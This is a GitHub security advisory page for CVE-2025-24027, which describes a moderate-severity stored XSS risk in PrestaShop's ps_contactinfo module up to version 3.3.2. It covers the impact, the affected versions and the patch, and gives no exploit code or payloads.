GHSA-35pq-7pv2-2rfw: ps_contactinfo has a potential XSS due to usage of the nofilter tag in template

Skip to content

Navigation Menu

• • GitHub Copilot

    Write better code with AI

  • Security

    Find and fix vulnerabilities

  • Actions

    Automate any workflow

  • Codespaces

    Instant dev environments

  • Issues

    Plan and track work

  • Code Review

    Manage code changes

  • Discussions

    Collaborate outside of code

  • Code Search

    Find more, search less

• Explore

  • Learning Pathways
  • White papers, Ebooks, Webinars
  • Customer Stories
  • Partners
  • Executive Insights

• • GitHub Sponsors

    Fund open source developers

*   The ReadME Project
    
    GitHub community articles

• • Enterprise platform

    AI-powered developer platform

• Pricing

Provide feedback

Saved searches****Use saved searches to filter your results more quickly

Sign up

1. GitHub Advisory Database
2. GitHub Reviewed
3. CVE-2025-24027

ps_contactinfo has a potential XSS due to usage of the nofilter tag in template

Moderate severity GitHub Reviewed Published Jan 22, 2025 in PrestaShop/ps_contactinfo • Updated Jan 22, 2025

Package

composer prestashop/ps_contactinfo (Composer)

Affected versions

<= 3.3.2

Description

Impact

This can not be exploited in a fresh install of PrestaShop, only shops made vulnerable by third party modules are concerned.

For example, if your shop has a third party module vulnerable to SQL injections, then ps_contactinfo might execute a stored XSS in FO.

Patches

The long term fix is to have all your modules maintained and updated.
The fix on ps_contactinfo will keep formatted addresses from displaying an xss stored in the database.

Workarounds

none

References

none

References

• GHSA-35pq-7pv2-2rfw
• https://nvd.nist.gov/vuln/detail/CVE-2025-24027
• PrestaShop/ps_contactinfo@d60f9a5

Published to the GitHub Advisory Database

Jan 22, 2025

Last updated

Jan 22, 2025